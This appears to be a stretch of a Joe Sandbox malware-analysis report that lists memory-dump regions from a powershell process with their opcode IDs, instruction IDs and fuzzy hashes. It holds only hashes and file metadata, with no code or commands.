                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a14703e0f5cb2491d3cb35fde20480ae881f0d1abc64bc46112d05cdcbd0886e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 305f9f7dd2275cd867b572f54a7ca97454bce79352823c6096b63e42eaff4d74
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a14703e0f5cb2491d3cb35fde20480ae881f0d1abc64bc46112d05cdcbd0886e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6141C030B002189FEB08EBB4C844BAE7BEAEF85259F1484BDD9059B360DB35DD01CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bcff387a8448540b085a1dbf1f287e005780fc6d49f63e390915a3bef749a32e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 216e2449dc223c28c5b075b312f62e3208e615469726747fc40956112179ec5d
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcff387a8448540b085a1dbf1f287e005780fc6d49f63e390915a3bef749a32e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6141D62060D3C5AFD716AB74A8147BE7FB19F43205F1944EEC885CBA92CB784D89C752
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 16ce9b91966248ebf2ed9526edd6474a64e158ca221c762ae9115840bfef6ab9
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 84a3a3e1fea058a98f1dfc5749d208e7cbc0d4956763b79808975df4fcb85db5
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16ce9b91966248ebf2ed9526edd6474a64e158ca221c762ae9115840bfef6ab9
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA419E71A007559FDF21CF68C8406DEBBF2BF88310F108A6AD496A7751C734A844CB60
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9168d108dd24dce9aa3d843a1df20d8af7ccbd48bbdd65f0a4da977a946fbb02
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fd4054d84d853d96981604c8eede1f18d76ceef153924a0333d4a106467fb23e
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9168d108dd24dce9aa3d843a1df20d8af7ccbd48bbdd65f0a4da977a946fbb02
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C941CF34B046069FC714EF64C4889AEBBF2FF88310B018969D916D73A5CB70ED46CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6c6c4fcb08674f800030728ab1498d85f45445642f922f3132c0e017d3917a16
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8ca06d125c2f20b9adda05334469e38d85a27b9c6dcf5c1750aa2cf1a6099ad4
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c6c4fcb08674f800030728ab1498d85f45445642f922f3132c0e017d3917a16
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A931C276A082858FDF12CF34D8645DEBFF1AF89210B1585ABD482EB751CB305D09CBA1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8625272f5c3f1f9526eca0117e397e24e4b56ace6e97169cf936f826a9612a0a
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b172bcdb0ae14b0730706508398676e7ffe269d8dd92a9b8e224700f120f03e8
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8625272f5c3f1f9526eca0117e397e24e4b56ace6e97169cf936f826a9612a0a
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB416C74A002099FCB54DF64C480A9FB7F2FF88354B10CA69DA199B354DB31EE05CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 218881c1d5be869a23222f49dee7b372304c190a1d7a598afd564da4c31a6de8
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4114020a42fdc06ebc04bbb8320ff6e9bb06206286d6e5e642fc4dc1bd8a2f81
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 218881c1d5be869a23222f49dee7b372304c190a1d7a598afd564da4c31a6de8
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6531D8B47041046BD7149B79E66862A77E7FFCC204B21403ACA06CBB59EF71EC42C761
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: cfd56b398850d0906954d221549d301fb3e56ce7d4f72e9d9b6d4dd962a2f76e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2ffe49032ef31f602d2856d3d5d239e9955cc8fb582161bceb223c0163fcb525
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfd56b398850d0906954d221549d301fb3e56ce7d4f72e9d9b6d4dd962a2f76e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F3104302097C08FD713976898646E87FB1AF82218F0980EBC4858F693D7299C4BE792
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 685d4a031d200a30ad17798b7663c7df95a8006238f6f881d22f86feb45c300c
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8733233ede5cc25eab4652086f7d32848b97d74c84b6f774f78b1f2b5d0a2f63
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 685d4a031d200a30ad17798b7663c7df95a8006238f6f881d22f86feb45c300c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B31D170B043859FDB16AB64E848BAEBFF1EF8A301F1440AAD845DB791DB349C41CB51
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: d43b63c91539b07bef956b11203820549d522f01fe421e269bb9d64ca69f307b
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: da73cf29030117e939d1fdbff6f145ed0f9046c983764373aad8b982477e72e8
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d43b63c91539b07bef956b11203820549d522f01fe421e269bb9d64ca69f307b
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE311B74A00206DFCB55EF59D880AAABBF2FF88204B18C469D909DB715D731ED42CBA1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 093e10c4a207844fefd33dc28406959d495adbfa025e394749980d8c12b5eabd
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2b3f97b824bbdbefb102e4bd3549f59acfa7c74ab469e45730b08b0564b139da
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 093e10c4a207844fefd33dc28406959d495adbfa025e394749980d8c12b5eabd
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C414C74A0024A9FCB50DF64D490AAEB7F2FF88314F108AA9D9199B355DB70EE05CF90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: edfe157377bb117e8142ed01ceaca81ddc8bf36b07547e71b2c857fb3169f091
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7bb8becdc33453d102262f5e25368bc980c234df6f537f718a30f9caaf007a9b
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: edfe157377bb117e8142ed01ceaca81ddc8bf36b07547e71b2c857fb3169f091
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6317E70A00205DFDB55DF59E8806AABBF2FF88214B18C469D909DB715D331ED42CFA0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3dfd7dad7402aa2d8328c4b8646f74683c51cc95fa5b9f56dce2ea3c1f488140
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b0ed024322b49fbcd77bfca2167263da519defafa6d3274c44e0fd34a7b22894
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dfd7dad7402aa2d8328c4b8646f74683c51cc95fa5b9f56dce2ea3c1f488140
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF31DB75E042098FCF44DFA8D5849CDB7F1FF88348B114965E908AB369D7B1AE1ACB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ea01f69515186689eb73249ac9a98062520e94e8f995c3397aba82f5ab26403a
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: bd17a2a0eac67e3549114a42f0c9af2fafb7e14ede9b3c981f741d74355f981b
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea01f69515186689eb73249ac9a98062520e94e8f995c3397aba82f5ab26403a
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8331C1B4B003099FCB14EBA9E848B6EBBF6FF88301F144069E90597790CB35AC41CB51
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f604adeca6a204328663a20790f2b52251589c5c8def47234f1be2690d4eb3f8
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1ab8400706ffef5f25c22e35ab25880077c8fbba2c379c7f3117201dc2ce543d
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f604adeca6a204328663a20790f2b52251589c5c8def47234f1be2690d4eb3f8
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D42196307042019FD7E89A19C48896EB7F7DBC9244B5A44AAE305CB3A2DBB6DD45CB41
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0a8cadc40cf52972af6bfb78c3e3ad145569d9c69dd516ac4c45394309a2ea0b
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5549b4a27fb04f2f3fcea4fcdb2f2fa74de376f1a0724f3b59bee33cc29e041f
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a8cadc40cf52972af6bfb78c3e3ad145569d9c69dd516ac4c45394309a2ea0b
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 993193316063449FDB069BB4D864AEE7FF6EF8A314F0944AAD8429B392DB359C05C760
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fcaaf843ea9d93fb9436b23bc335f24ef17b38f41e142c9049177d39a31d0b2c
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4594d7bd90164e8c6bc51a6907d84004196f2ca675f7191fef93b04eb2fbc2e0
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fcaaf843ea9d93fb9436b23bc335f24ef17b38f41e142c9049177d39a31d0b2c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 583189B0D057498FCB51DFB9C8801CEBBF0BF8A300B1185AAE558E7311E774A945CBA1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 874787cfb211da36225ea4c1fee289f23efab1531720f92a6b434d15868dcf80
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4ffb7d24ecc01ca26ab32361b9310f86b64167c7619ecf9cae7a4f5996ffc143
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 874787cfb211da36225ea4c1fee289f23efab1531720f92a6b434d15868dcf80
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E021DE307002159FEB18AE64C844BBE77EAFF85329F048479E5158B3A0DB75DD41CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e555d01c34ca12656cd8fa4b56574648dcef305b3cfc1e3c46e2c43f400f9e00
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: dfa5dc64a11cf0fa37a0e3504a33af10daeca08119166e383f4a6220d0e8c8d3
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e555d01c34ca12656cd8fa4b56574648dcef305b3cfc1e3c46e2c43f400f9e00
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59316B34A04218CFDB14DFA9C824ADEB7F5EF88214F158469D50AEB754EB75ED02CBA0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 943acff3242e2751800756fd00c63bc08ea8c761b2ccd9f3e5437d5869c859db
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: aa3a53a3b85aed557c0e54514c643bb3cd597214abd0c66da4c293c0c19e499a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 943acff3242e2751800756fd00c63bc08ea8c761b2ccd9f3e5437d5869c859db
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D221AE517842402BE706373248A873F2B87CBC1B04F184099E602CF7C4DFA98C569BE1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 018bbbd8e7b1b5886cc25c263e367d7b0b6c77dbca47bbb41614831b99e74d19
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2f875fee43f62aff30441ae1974ef68e1f67a2c6c63f45a52c0b1f73f9330ae1
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 018bbbd8e7b1b5886cc25c263e367d7b0b6c77dbca47bbb41614831b99e74d19
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31213E70300B008BD725DF24D494A9AB3E2FFC4309F158A29D9868B6A5DB75F846CB91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
